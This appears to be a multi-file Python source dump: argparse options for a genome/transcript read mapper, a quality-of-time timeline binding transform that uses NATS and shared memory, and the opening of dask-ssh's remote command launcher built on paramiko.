mapping_group.add_argument('--mismatch-alphabet', dest="genome_mismatch_alphabet", metavar="alphabet", help='The mismatch alphabet. Default "%s"' % (self.genome_mismatch_alphabet))
def register_transcript_mapping(self, parser):
"""Register the transcript mapping parameters with the
given arparse parser
parser -- the argparse parser
"""
# transcript mapping parameter
transcript_mapping_group = parser.add_argument_group('Transcript mapping parameters')
transcript_mapping_group.add_argument('-a', '--annotation', dest="annotation", metavar="gtf", help='''Path to the GTF annotation. If specified the transcriptome generated from the annotation is
used in addition to de-novo junctions.''')
transcript_mapping_group.add_argument('-r', '--transcript-index', dest="transcript_index", help='''GTF Transcriptome index. If not specified and an annotation is given,
it is assumed to be <gtf>.junctions.gem''')
transcript_mapping_group.add_argument('-k', '--transcript-keys', dest="transcript_keys", help='''Transcriptome .keys file. If not specified and an annotation is given,
it is assumed to be <gtf>.junctions.keys''')
transcript_mapping_group.add_argument('-tm', '--transcript-mismatches', dest="transcript_mismatches", metavar="mm", help='Set the allowed mismatch ratio as 0 < mm < 1. Default to genome setting.')
transcript_mapping_group.add_argument('--transcript-quality-threshold', dest="transcript_quality_threshold", metavar="qth", help='Good quality threshold. Bases with a quality score >= threshold are considered good. Default to genome setting.')
transcript_mapping_group.add_argument('--transcript-max-decoded-matches', dest="transcript_max_decoded_matches", metavar="mdm", help='Maximum decoded matches. Default %d' % (self.transcript_max_decoded_matches))
transcript_mapping_group.add_argument('--transcript-min-decoded-strata', dest="transcript_min_decoded_strata", metavar="mds", help='Minimum decoded strata. Default to genome setting.')
transcript_mapping_group.add_argument('--transcript-min-matched-bases', dest="transcript_min_matched_bases", metavar="mmb", help='Minimum ratio of bases that must be matched. Default to genome setting.')
transcript_mapping_group.add_argument('--transcript-max-edit-distance', dest="transcript_max_edit_distance", metavar="med", help='Maximum edit distance (ratio) allowed for an alignment. Default to genome setting.')
transcript_mapping_group.add_argument('--transcript-mismatch-alphabet', dest="transcript_mismatch_alphabet", metavar="alphabet", help='The mismatch alphabet. Default to genome setting.')
transcript_mapping_group.add_argument('--transcript-strata-after-best', dest="transcript_strata_after_best", metavar="strata", help='The number of strata examined after the best one. Default to genome setting.')
transcript_mapping_group.add_argument('--max-read-length', dest="max_read_length", type=int, help='''The maximum read length. This is used to create the de-novo
transcriptome and acts as an upper bound. Default auto-detect''')
def register_junctions(self, parser):
"""Register the junction detection parameter with the
given arparse parser
parser -- the argparse parser
"""
# junction detection parameter
junctions_group = parser.add_argument_group('De-novo junction detection parameters')
junctions_group.add_argument('-jm', '--junction-mismatches', dest="junction_mismatches", metavar="jmm",
help='Set the allowed mismatch ratio for junction detection as 0 < mm < 1. Default %s' % (str(self.junction_mismatches)))
junctions_group.add_argument('--junction-max-matches', dest="junctions_max_junction_matches", metavar="mm",
help='Maximum number of multi-maps allowed for a junction. Default %d' % (self.junctions_max_junction_matches))
junctions_group.add_argument('--min-intron-size', dest="junctions_min_intron_size", type=int, metavar="mil", help='Minimum intron length. Default %d' % self.junctions_min_intron_size)
junctions_group.add_argument('--max-intron-length', dest="junctions_max_intron_size", type=int, metavar="mil", help='Maximum intron length. Default %d' % self.junctions_max_intron_size)
junctions_group.add_argument('--refinement-step', dest="junctions_refinement_step_size", metavar="r", help='Refine the minimum split size when constraints on number of candidates are not met. Default %d' % self.junctions_refinement_step_size)
junctions_group.add_argument('--min-split-size', dest="junctions_min_split_size", type=int, metavar="mss", help='Minimum split length. Default 15')
junctions_group.add_argument('--matches-threshold', dest="junctions_matches_threshold", metavar="mt", help='Maximum number canidates considered when splitting the read. Default 75')
junctions_group.add_argument('--junction-coverage', dest="junctions_coverage", type=int, metavar="jc", help='Minimum allowed junction converage. Default %d' % self.junctions_coverage)
junctions_group.add_argument('--junction-consensus', dest="junctions_consensus", metavar="jc", help='Consensus used to detect junction sites. Default \'%s\'' % (",".join(["(%s,%s)" % (c[0], c[1]) for c in self.junctions_consensus])))
junctions_group.add_argument('--junction-strata-after-best', dest="junctions_strata_after_best", metavar="s", help='Maximum number of strata to examin after best. Default %d' % (self.junctions_strata_after_best))
def register_pairing(self, parser):
"""Register the pairing parameter with the
given arparse parser
parser -- the argparse parser
"""
pairing_group = parser.add_argument_group('Pairing parameters')
pairing_group.add_argument('--pairing-quality-threshold', dest="pairing_quality_threshold", metavar="pq", help='Good quality threshold. Bases with a quality score >= threshold are considered good. Defaults to genome setting.')
pairing_group.add_argument('--pairing-max-decoded-matches', dest="pairing_max_decoded_matches", metavar="pdm", help='Maximum decoded matches. Default %d' % self.pairing_max_decoded_matches)
pairing_group.add_argument('--pairing-min-decoded-strata', dest="pairing_min_decoded_strata", metavar="pds", help='Minimum decoded strata. Default to %d' % self.pairing_min_decoded_strata)
pairing_group.add_argument('--pairing-min-insert-size', dest="pairing_min_insert_size", metavar="is", help='Minimum insert size allowed for pairing. Default %d' % self.pairing_min_insert_size)
pairing_group.add_argument('--pairing-max-insert-size', dest="pairing_max_insert_size", metavar="is", help='Maximum insert size allowed for pairing. Default to max intron size')
def register_stats(self, parser):
"""Register stats parameter with the
given arparse parser
parser -- the argparse parser
"""
stats_group = parser.add_argument_group('Stats')
stats_group.add_argument('--no-stats', dest="stats_create", default=None, action="store_false", help='Skip creating stats')
stats_group.add_argument('--stats-json', dest="stats_json", default=None, action="store_true", help='Write a json file with the statistics in addition to the normal stats output.')
|
sherlock_qot_transform_traffic.py
|
# @file helloworld.py
# @brief Sherlock QoT Python Transform for Traffic Input
# @author Anon D'Anon
#
# Copyright (c) Anon, 2018.
# Copyright (c) Anon Inc., 2018.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# System calls
import sys
# Argument Parsing
import argparse
# Signal Handlers
import signal
# Module to Read Core Time
import time
# For Type Checking
import inspect
# For Spawning Threads and using Mutex Locks
from threading import Thread, Lock
# JSON Serialization/De-serialization
import json
# Import AsyncIO
import asyncio
# Import Socket Library
import socket
# Import the Math Library
import math
# Import Array Library
import array
# Import OS functionality
import os
# Share Memory
import mmap
# Import C-Style Structs
import struct
# NATS Python 3 Client
from nats.aio.client import Client as NATS
from nats.aio.errors import ErrConnectionClosed, ErrTimeout, ErrNoServers
# Enum Type
from enum import Enum
# Hard coded maximum ring buffer size
MAX_RING_BUFFER_SIZE = 10
# Timeline Socket Path
TL_SOCKET_PATH = "/tmp/qot_timeline"
# Global Variable used to indicate if the binding has been initialized
initialized = False
class ReturnTypes(Enum):
""" class that implements return types as codes """
QOT_RETURN_TYPE_OK = 0 # Return Type OK
QOT_RETURN_TYPE_ERR = 1 # Return Type generic error
QOT_RETURN_TYPE_CONN_ERR = 2 # Connection error to timeline service
def __int__(self):
return self.value
class TimelineMessageTypes(Enum):
""" qot timeline service message codes """
TIMELINE_CREATE = 0 # Create a timeline
TIMELINE_DESTROY = 1 # Destroy a timeline
TIMELINE_UPDATE = 2 # Update timeline binding parameters
TIMELINE_BIND = 3 # Bind to a timeline
TIMELINE_UNBIND = 4 # Unbind from a timeline
TIMELINE_QUALITY = 5 # Get the QoT Spec for this timeline
TIMELINE_INFO = 6 # Get the timeline info
TIMELINE_SHM_CLOCK = 7 # Get the timeline clock rd-only shm fd
TIMELINE_SHM_CLKSYNC = 8 # Get the timeline clock shm fd
TIMELINE_UNDEFINED = 9 # Undefined function
def __int__(self):
return self.value
class TimelineTypes(Enum):
""" Timeline Types enumerated class """
QOT_TIMELINE_LOCAL = 0 # Local Timeline -> Internal or External Reference
QOT_TIMELINE_GLOBAL = 1 # Global Timeline -> Tied to UTC
def __int__(self):
return self.value
class RingBuffer:
""" class that implements a not-yet-full buffer """
def __init__(self,size_max):
self.max = size_max
self.data = []
self.mutex = Lock()
class __Full:
""" class that implements a full buffer """
def append(self, x):
""" Append an element overwriting the oldest one. """
self.mutex.acquire()
try:
self.data[self.cur] = x
self.cur = (self.cur+1) % self.max
finally:
self.mutex.release()
def get(self):
""" return list of elements in correct order """
self.mutex.acquire()
try:
ret_data = self.data[self.cur:]+self.data[:self.cur]
finally:
self.mutex.release()
return ret_data
def append(self,x):
"""append an element at the end of the buffer"""
print("Added data to ring buffer")
self.mutex.acquire()
try:
self.data.append(x)
if len(self.data) == self.max:
self.cur = 0
# Permanently change self's class from non-full to full
self.__class__ = self.__Full
finally:
self.mutex.release()
def get(self):
""" Return a list of elements from the oldest to the newest. """
self.mutex.acquire()
try:
ret_data = self.data
finally:
self.mutex.release()
return ret_data
class TimelineBinding:
"""TimelineBinding class lets apps bind to a timeline and perform various
time-related operations on the timeline"""
def __init__(self, mode="app"):
# Set the Mode as "transform" or "app"
self._mode = mode
# Initialize Timeline Parameters
self._timeline_uuid = None # Timeline UUID (Unique name)
self._timeline_type = "local" # Timeline type (local or global)
self._timeline_index = -1 # Timeline ID
# Initialize Binding Parameters
self._binding_name = None # Binding Name
self._binding_id = -1 # Binding ID
self._accuracy_ns = None # Accuracy Specification in nanoseconds
self._resolution_ns = None # Resolution Specification in nanoseconds
# Initialize Scheduling Parameters
self._offset_ns = 0 # Scheduling Offset
self._period_ns = 0 # Scheduling Period
# Initialize AsyncIO Loop
if mode == "transform":
self._loop = asyncio.get_event_loop()
# Else: mode defaults to "app"
####### Private Functions #######
# Decorator 1 to Perform Type Checking
def checkargs(function):
def _f(*arguments):
for index, argument in enumerate(inspect.getfullargspec(function)[0]):
if not isinstance(arguments[index], function.__annotations__[argument]):
raise TypeError("{} is not of type {}".format(arguments[index], function.__annotations__[argument]))
return function(*arguments)
_f.__doc__ = function.__doc__
return _f
# Decorator 2 to Perform Type Checking
def coerceargs(function):
def _f(*arguments):
new_arguments = []
for index, argument in enumerate(inspect.getfullargspec(function)[0]):
new_arguments.append(function.__annotations__[argument](arguments[index]))
return function(*new_arguments)
_f.__doc__ = function.__doc__
return _f
def _recv_fds(self, msglen, maxfds):
fds = array.array("i") # Array of ints
msg, ancdata, flags, addr = self._sock.recvmsg(msglen, socket.CMSG_LEN(maxfds * fds.itemsize))
for cmsg_level, cmsg_type, cmsg_data in ancdata:
if (cmsg_level == socket.SOL_SOCKET and cmsg_type == socket.SCM_RIGHTS):
# Append data, ignoring any truncated integers at the end.
fds.fromstring(cmsg_data[:len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
return msg, list(fds)
def _send_timeline_msg(self):
'''Send a request to the QoT Timeline Service over a UDP socket'''
# Convert message to JSON
message = json.dumps(self._tl_msg)
# Send message to timeline service
bytesSent = self._sock.send(message.encode())
# Maximum message size to receive in one go
MAX_BUF_LEN = 4096
# Received Message
msg_recv = ""
recv_flag = False
# Wait for a response from the timeline service
if bytesSent > 0 and self._tl_msg["msgtype"] != int(TimelineMessageTypes.TIMELINE_SHM_CLOCK):
amount_received = MAX_BUF_LEN
while amount_received == MAX_BUF_LEN:
data = self._sock.recv(MAX_BUF_LEN).decode()
amount_received = len(data)
msg_recv = msg_recv + data
recv_flag = True
# Possible error in receiving message
if recv_flag == False:
print ('Could not receive data from service')
return ReturnTypes.QOT_RETURN_TYPE_CONN_ERR
# Decode Message from JSON
self._tl_msg = json.loads(msg_recv)
return self._tl_msg["retval"]
elif bytesSent == 0:
print ('Failed to send message to service')
self._tl_msg["retval"] = int(ReturnTypes.QOT_RETURN_TYPE_CONN_ERR)
return self._tl_msg["retval"]
else: # Message request to get clock shared memory
self._tl_msg["retval"] = int(ReturnTypes.QOT_RETURN_TYPE_OK)
return self._tl_msg["retval"]
return ReturnTypes.QOT_RETURN_TYPE_ERR
def _populate_timeline_msg_data(self):
'''Populate the fields of the timeline message based on the instance parameters'''
self._tl_msg = dict()
# Timeline Information
self._tl_msg["info"] =dict()
self._tl_msg["info"]["index"] = self._timeline_index
self._tl_msg["info"]["type"] = int(self._tl_type)
self._tl_msg["info"]["name"] = self._timeline_uuid
# Binding Information
self._tl_msg["binding"] = dict()
self._tl_msg["binding"]["name"] = self._binding_name
self._tl_msg["binding"]["id"] = self._binding_id;
# QoT Requirements
self._tl_msg["demand"] = dict()
self._tl_msg["demand"]["resolution"] = dict()
self._tl_msg["demand"]["resolution"]["sec"] = int(math.floor(self._resolution_ns/1000000000))
self._tl_msg["demand"]["resolution"]["asec"] = int((self._resolution_ns % 1000000000)*1000000000)
self._tl_msg["demand"]["accuracy"] = dict()
self._tl_msg["demand"]["accuracy"]["above"] = dict()
self._tl_msg["demand"]["accuracy"]["below"] = dict()
self._tl_msg["demand"]["accuracy"]["above"]["sec"] = int(math.floor(self._accuracy_ns/1000000000))
self._tl_msg["demand"]["accuracy"]["above"]["asec"] = int((self._accuracy_ns % 1000000000)*1000000000)
self._tl_msg["demand"]["accuracy"]["below"]["sec"] = int(math.floor(self._accuracy_ns/1000000000))
self._tl_msg["demand"]["accuracy"]["below"]["asec"] = int((self._accuracy_ns % 1000000000)*1000000000)
def _populate_timeline_msg_type(self, msg_type: TimelineMessageTypes):
'''Populate the message type of the timeline message'''
# Message Type
self._tl_msg["msgtype"] = int(msg_type)
# Return Code
self._tl_msg["retval"] = int(ReturnTypes.QOT_RETURN_TYPE_ERR)
def _nats_subscribe(self):
'''Run the NATS Subscriber '''
self._nc = NATS()
# Connect to the NATS Server
yield from self._nc.connect(servers=["nats://nats.default.svc.cluster.local:4222"], io_loop=self._loop)
@asyncio.coroutine
def message_handler(msg):
subject = msg.subject
reply = msg.reply
data = msg.data.decode()
print("Received a message on '{subject} {reply}': {data}".format(
subject=subject, reply=reply, data=data))
# Parse the received JSON
params = json.loads(data)
# Add the latest parameters to the ring buffer
self._param_ring_buf.append(params)
# Simple publisher and async subscriber via coroutine.
tl_subject = "qot." + "timeline." + self._timeline_uuid + ".params"
sid = yield from self._nc.subscribe(tl_subject, cb=message_handler)
# Loop until the process unbinds from timeline
while self._nats_thread_running:
yield from asyncio.sleep(1, loop=self._loop)
# Disconnect from NATS Server
yield from self._nc.close()
def _dispatch_nats(self):
''' Thread Handler to dispatch NATS Subscriber'''
# Create a Ring Buffer of Clock Parameters
self._param_ring_buf = RingBuffer(MAX_RING_BUFFER_SIZE)
# Append initial value to ring buffer
init_params = {"l_mult":0,"l_nsec":0,"last":0,"mult":0,"nsec":0,"u_mult":0,"u_nsec":0}
self._param_ring_buf.append(init_params)
# Run AsynIO Loop
self._loop.run_until_complete(self._nats_subscribe())
def _find_clkparams(self, coretime):
'''Find the appropriate clock parameters based on the core time'''
# Get the list of stored parameters
param_list = self._param_ring_buf.get()
# Parse the param list to find the appropriate clock parameters
for list_params in reversed(param_list):
# Compare with "last" after converting "last" to fractional seconds
if coretime > list_params["last"]/1000000000:
params = list_params
break
return params
def _core2timeline(self, period_flag, coretime_ns, clk_params):
'''Convert from core time to timeline time'''
if period_flag:
tl_time = coretime_ns + int(clk_params[1]*coretime_ns)/1000000000;
else:
tl_time = coretime_ns - clk_params[0];
tl_time = clk_params[2] + tl_time + (int(clk_params[1]*tl_time)/1000000000);
return tl_time
def _timeline2core(self, period_flag, tltime_ns, clk_params):
'''Convert from timeline time to core time'''
if period_flag:
core_time = int(tltime_ns*1000000000)/(clk_params[1]+1000000000)
else:
diff = tltime_ns - clk_params[2]
quot = int(diff*1000000000)/(clk_params[1]+1000000000)
core_time = clk_params[0] + quot;
return core_time
def _compute_qot(self, coretime_ns, clk_params):
'''Compute the QoT estimates for the timestamp'''
upper_bound = int(clk_params[5]*(coretime_ns - clk_params[0]))/1000000000 + clk_params[3]
lower_bound = int(clk_params[6]*(coretime_ns - clk_params[0]))/1000000000 + clk_params[4]
return upper_bound, lower_bound
####### Public API Calls #######
@checkargs
def timeline_bind(self: object, timeline_uuid: str, app_name: str, res_ns: int, acc_ns: int):
'''
* @brief Bind to a timeline with a given resolution and accuracy
* @param timeline_uuid Name of the timeline
* @param app_name Name of this binding
* @param res_ns Maximum tolerable unit of time in nanoseconds
* @param acc_ns Maximum tolerable deviation from true time in nanoseconds
* @return A status code indicating success (0) or other'''
print("Binding to timeline %s" % timeline_uuid)
self._timeline_uuid = timeline_uuid
self._binding_name = app_name
self._resolution_ns = res_ns
self._accuracy_ns = acc_ns
self._timeline_index = 0
self._binding_id = -1
# Timeline type
if timeline_uuid.find("gl_") == 0:
self._tl_type = TimelineTypes.QOT_TIMELINE_GLOBAL
else:
self._tl_type = TimelineTypes.QOT_TIMELINE_LOCAL
# Return Value
retval = ReturnTypes.QOT_RETURN_TYPE_OK
if self._mode == "transform":
# Start a new thread for NATS which runs AsyncIO
self._nats_thread_running = True # Flag to terminate thread
self._nats_thread = Thread(target=self._dispatch_nats)
self._nats_thread.start()
else: # Assume App Mode
# Create a UDS socket
self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
# Connect the socket to the port where the qot-timeline-service is listening
try:
self._sock.connect(TL_SOCKET_PATH)
except socket.error as msg:
print (msg)
retval = ReturnTypes.QOT_RETURN_TYPE_CONN_ERR
return retval
# Initialize Timeline service message
self._populate_timeline_msg_data()
# Send TIMELINE_CREATE message to timeline service
self._populate_timeline_msg_type(TimelineMessageTypes.TIMELINE_CREATE)
if self._send_timeline_msg() != int(ReturnTypes.QOT_RETURN_TYPE_OK):
print ('Failed to send timeline metadata to timeline service')
retval = ReturnTypes.QOT_RETURN_TYPE_ERR
return retval
else:
self._timeline_index = self._tl_msg["info"]["index"]
print ('Timeline ID is %d' % self._timeline_index)
# Send TIMELINE_BIND message to timeline service
self._populate_timeline_msg_data()
self._populate_timeline_msg_type(TimelineMessageTypes.TIMELINE_BIND)
if self._send_timeline_msg() != int(ReturnTypes.QOT_RETURN_TYPE_OK):
print ('Failed to send timeline metadata to timeline service')
retval = ReturnTypes.QOT_RETURN_TYPE_ERR
return retval
else:
self._binding_id = self._tl_msg["binding"]["id"]
print ('Binding ID is %d' % self._binding_id)
# Send TIMELINE_SHM_CLOCK message to timeline service
self._populate_timeline_msg_data()
self._populate_timeline_msg_type(TimelineMessageTypes.TIMELINE_SHM_CLOCK)
if self._send_timeline_msg() != int(ReturnTypes.QOT_RETURN_TYPE_OK):
print ('Failed to request timeline clock from timeline service')
retval = ReturnTypes.QOT_RETURN_TYPE_ERR
return retval
else:
# Get the timeline clock parameter file descriptor from the timeline service
msg, shm_fd_list = self._recv_fds(20, 1)
shm_fd = shm_fd_list[0]
# Memory map the parameters into a byte array
self._clk_params = mmap.mmap(shm_fd, 0, flags=mmap.MAP_SHARED, prot=mmap.PROT_READ)
print("Bound to timeline %s" % timeline_uuid)
return retval
@checkargs
def timeline_unbind(self: object):
'''
* @brief Unbind from a timeline
* @return A status code indicating success (0) or other'''
if self._mode == "transform":
# NATS Thread Join
self._nats_thread_running = False
self._nats_thread.join()
# Close the AsyncIO Loop
self._loop.close()
else:
# Send TIMELINE_BIND message to timeline service
self._populate_timeline_msg_type(TimelineMessageTypes.TIMELINE_UNBIND)
if self._send_timeline_msg() != int(ReturnTypes.QOT_RETURN_TYPE_OK):
print ('Failed to send unbing message to timeline service')
retval = ReturnTypes.QOT_RETURN_TYPE_ERR
return retval
else:
print ('Unbound from timeline service')
return ReturnTypes.QOT_RETURN_TYPE_OK
@checkargs
def timeline_get_accuracy(self: object):
'''
* @brief Get the accuracy requirement associated with this binding
* @return acc Maximum tolerable deviation from true time in nanoseconds'''
return self._accuracy_ns
@checkargs
def timeline_get_resolution(self: object):
'''
* @brief Get the resolution requirement associated with this binding
* @return res Maximum tolerable unit of time in nanoseconds'''
return self._resolution_ns
@checkargs
def timeline_get_name(self: object):
'''
* @brief Query the name of this application
* @return name Application name'''
return self._binding_name
@checkargs
def timeline_get_uuid(self: object):
'''
* @brief Query the name of this timeline
* @return name Timeline name'''
return self._timeline_uuid
@checkargs
def timeline_set_accuracy(self: object, acc_ns: int):
'''
* @brief Set the accuracy requirement associated with this binding
* @param acc Maximum tolerable deviation from true time in nanoseconds
* @return A status code indicating success (0) or other'''
self._accuracy_ns = acc_ns
if self._mode != "transform":
# Send TIMELINE_UPDATE message to timeline service
self._populate_timeline_msg_data()
self._populate_timeline_msg_type(TimelineMessageTypes.TIMELINE_UPDATE)
if self._send_timeline_msg() != int(ReturnTypes.QOT_RETURN_TYPE_OK):
print ('Failed to send set accuracy to timeline service')
retval = ReturnTypes.QOT_RETURN_TYPE_ERR
return retval
return ReturnTypes.QOT_RETURN_TYPE_OK
@checkargs
def timeline_set_resolution(self: object, res_ns: int):
'''
* @brief Set the resolution requirement associated with this binding
* @param res Maximum tolerable unit of time in nanoseconds
* @return A status code indicating success (0) or other'''
self._resolution_ns = res_ns
if self._mode != "transform":
# Send TIMELINE_UPDATE message to timeline service
self._populate_timeline_msg_data()
self._populate_timeline_msg_type(TimelineMessageTypes.TIMELINE_UPDATE)
if self._send_timeline_msg() != int(ReturnTypes.QOT_RETURN_TYPE_OK):
print ('Failed to send set accuracy to timeline service')
retval = ReturnTypes.QOT_RETURN_TYPE_ERR
return retval
return ReturnTypes.QOT_RETURN_TYPE_OK
@checkargs
def timeline_get_coretime(self: object):
'''
* @brief Query the time according to the core
* @return core_now Estimated time in fractional seconds
Note: Core Clock is CLOCK_REALTIME'''
return time.clock_gettime(time.CLOCK_REALTIME)
@checkargs
def timeline_gettime(self: object):
'''
* @brief Query the time according to the timeline
* @return est Estimated timeline time in fractional seconds with uncertainty'''
# Read the CLOCK_REALTIME core time
core_now_ns = int(math.floor(time.clock_gettime(time.CLOCK_REALTIME)*1000000000))
# Unpack the Memory-mapped Clock Parameters
params = struct.unpack('@qqqqqqq', self._clk_params)
tl_time = dict()
# Convert from core time to timeline time
tl_time["time_estimate"] = float(self._core2timeline(False, core_now_ns, params))/1000000000
# Add the Uncertainty
tl_time["interval_above"], tl_time["interval_below"] = self._compute_qot(core_now_ns, params)
tl_time["interval_above"] = float(tl_time["interval_above"])/1000000000
tl_time["interval_below"] = float(tl_time["interval_below"])/1000000000
# Return Timestamp, Upper Bound, Lower Bound
return tl_time
@checkargs
def timeline_set_schedparams(self: object, period_ns: int, offset_ns: int):
'''
* @brief Set the periodic scheduling parameters requirement associated with this binding
* @param start_offset First wakeup time
* @param period wakeup period
* @return A status code indicating success (0) or other'''
self._offset_ns = offset_ns
self._period_ns = period_ns
return 0
@checkargs
def timeline_waituntil(self: object, abs_time: float):
'''
* @brief Block wait until a specified uncertain point
* @param abs_time the absolute fractional time to wake up at
* @return Time at which the program resumes'''
# Unpack the Memory-mapped Clock Parameters
params = struct.unpack('@qqqqqqq', self._clk_params)
# Translate timeline time duration to core time
core_duration = float(self._timeline2core(False, int(abs_time*1000000000), params))/1000000000
# Sleep for the duration
time.sleep(core_duration)
return self.timeline_gettime() # Needs to be fleshed out
@checkargs
def timeline_waituntil_nextperiod(self: object):
'''
* @brief Block and wait until next period
* @return utp Returns the actual uncertain wakeup time'''
return self.timeline_gettime() # Needs to be fleshed out
@checkargs
def timeline_sleep(self: object, rel_time: float):
'''
* @brief Block for a specified length of uncertain time
* @param rel_time fractional seconds time to sleep for
* @return A status code indicating success (0) or other'''
# Unpack the Memory-mapped Clock Parameters
params = struct.unpack('@qqqqqqq', self._clk_params)
# Translate timeline time duration to core time
core_duration = float(self._timeline2core(True, int(rel_time*1000000000), params))/1000000000
# Sleep for the duration
time.sleep(core_duration)
return self.timeline_gettime() # Needs to be fleshed out
@checkargs
def timeline_core2rem(self: object, core_time: float):
'''
* @brief Converts core time to remote timeline time
* @param core_time time to be converted in nanoseconds
* @return A status code indicating success (0) or other'''
tl_time = dict()
# Find the appropriate clock parameters
if self._mode == "transform":
clk_params = self._find_clkparams(core_time)
# Translate core time to timeline time
tl_time["time_estimate"] = clk_params["nsec"] + (core_time*1000000000 - clk_params["last"]) + ((core_time*1000000000 - clk_params["last"])*(clk_params["mult"]))/1000000000
tl_time["time_estimate"] = float(tl_time["time_estimate"])/1000000000
# Add the uncertainty
tl_time["interval_above"] = float((clk_params["u_mult"]*(core_time*1000000000 - clk_params["last"]))/1000000000 + clk_params["u_nsec"])/1000000000
tl_time["interval_below"] = float((clk_params["l_mult"]*(core_time*1000000000 - clk_params["last"]))/1000000000 + clk_params["l_nsec"])/1000000000
else:
# Unpack the Memory-mapped Clock Parameters
params = struct.unpack('@qqqqqqq', self._clk_params)
# Translate core time to timeline time
tl_time["time_estimate"] = float(self._core2timeline(False, int(core_time*1000000000), params))/1000000000
# Add the uncertainty
tl_time["interval_above"], tl_time["interval_below"] = self._compute_qot(int(core_time*1000000000), params)
tl_time["interval_above"] = float(tl_time["interval_above"])/1000000000
tl_time["interval_below"] = float(tl_time["interval_below"])/1000000000
return tl_time
@checkargs
def timeline_rem2core(self: object, tl_time: float):
'''
* @brief Converts remote timeline time to core time
* @param tl_time time to be converted in nanoseconds
* @return core_time tl_time translated to core time'''
# Unpack the Memory-mapped Clock Parameters
params = struct.unpack('@qqqqqqq', self._clk_params)
# Translate timeline time duration to core time
core_time= float(self._timeline2core(False, int(rel_time*1000000000), params))/1000000000
return core_time
# Global Binding Class
binding = TimelineBinding("transform")
def init_transform(timeline_uuid: str, app_name: str):
print("Initializing transform ...")
# Bind to the timeline
global binding
binding.timeline_bind(timeline_uuid, app_name, 1000, 1000)
return
# Tranformation Main function invoked by Sherlock
def main(ctx,msg):
global binding
global initialized
if initialized == False:
# Initialize the Timeline Binding
init_transform('my_test_timeline', "qot_transform")
initialized = True
# Get the provided core time
sherlock_time = float(ctx._Context__msg.timestamp)/1000000000
print('---------------------------------------------------')
print('Received :%s: from Traffic Sensor' % str(msg))
print('Received Timestamp from Sherlock %f' % sherlock_time)
# Translate to Timeline Time
tl_time = binding.timeline_core2rem(sherlock_time)
print('Translated Timeline time is %f' % tl_time["time_estimate"])
print('Upper Uncertainty bound is %f' % tl_time["interval_above"])
print('Lower Uncertainty bound is %f' % tl_time["interval_below"])
print('\n')
# Send the data to the next stage
ctx.send(json.dumps(tl_time).encode('utf-8'))
return
|
ssh.py
|
from __future__ import print_function, division, absolute_import
import logging
import socket
import os
import sys
import time
import traceback
try:
from queue import Queue
except ImportError: # Python 2.7 fix
from Queue import Queue
from threading import Thread
from toolz import merge
from tornado import gen
logger = logging.getLogger(__name__)
# These are handy for creating colorful terminal output to enhance readability
# of the output generated by dask-ssh.
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def async_ssh(cmd_dict):
import paramiko
from paramiko.buffered_pipe import PipeTimeout
from paramiko.ssh_exception import (SSHException, PasswordRequiredException)
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
retries = 0
while True: # Be robust to transient SSH failures.
try:
# Set paramiko logging to WARN or higher to squelch INFO messages.
logging.getLogger('paramiko').setLevel(logging.WARN)
ssh.connect(hostname=cmd_dict['address'],
username=cmd_dict['ssh_username'],
port=cmd_dict['ssh_port'],
key_filename=cmd_dict['ssh_private_key'],
compress=True,
timeout=20,
banner_timeout=20) # Helps prevent timeouts when many concurrent ssh connections are opened.
# Connection successful, break out of while loop
break
except (SSHException,
PasswordRequiredException) as e:
print('[ dask-ssh ] : ' + bcolors.FAIL +
'SSH connection error when connecting to {addr}:{port}'
'to run \'{cmd}\''.format(addr=cmd_dict['address'],
port=cmd_dict['ssh_port'],
cmd=cmd_dict['cmd']) + bcolors.ENDC)
print(bcolors.FAIL + ' SSH reported this exception: ' + str(e) + bcolors.ENDC)
# Print an exception traceback
traceback.print_exc()
# Transient SSH errors can occur when many SSH connections are
# simultaneously opened to the same server. This makes a few
# attempts to retry.
retries += 1
if retries >= 3:
print('[ dask-ssh ] : '
+ bcolors.FAIL
+ 'SSH connection failed after 3 retries. Exiting.'
+ bcolors.ENDC)
# Connection failed after multiple attempts. Terminate this thread.
os._exit(1)
# Wait a moment before retrying
print(' ' + bcolors.FAIL +
'Retrying... (attempt {n}/{total})'.format(n=retries, total=3) +
bcolors.ENDC)
time.sleep(1)
# Execute the command, and grab file handles for stdout and stderr. Note
# that we run the command using the user's default shell, but force it to
# run in an interactive login shell, which hopefully ensures that all of the
# user's normal environment variables (via the dot files) have been loaded
# before the command is run. This should help to ensure that important
# aspects of the environment like PATH and PYTHONPATH are configured.
print('[ {label} ] : {cmd}'.format(label=cmd_dict['label'],
cmd=cmd_dict['cmd']))
stdin, stdout, stderr = ssh.exec_command('$SHELL -i -c \'' + cmd_dict['cmd'] + '\'', get_pty=True)
# Set up channel timeout (which we rely on below to make readline() non-blocking)
channel = stdout.channel
channel.settimeout(0.1)
def read_from_stdout():
"""
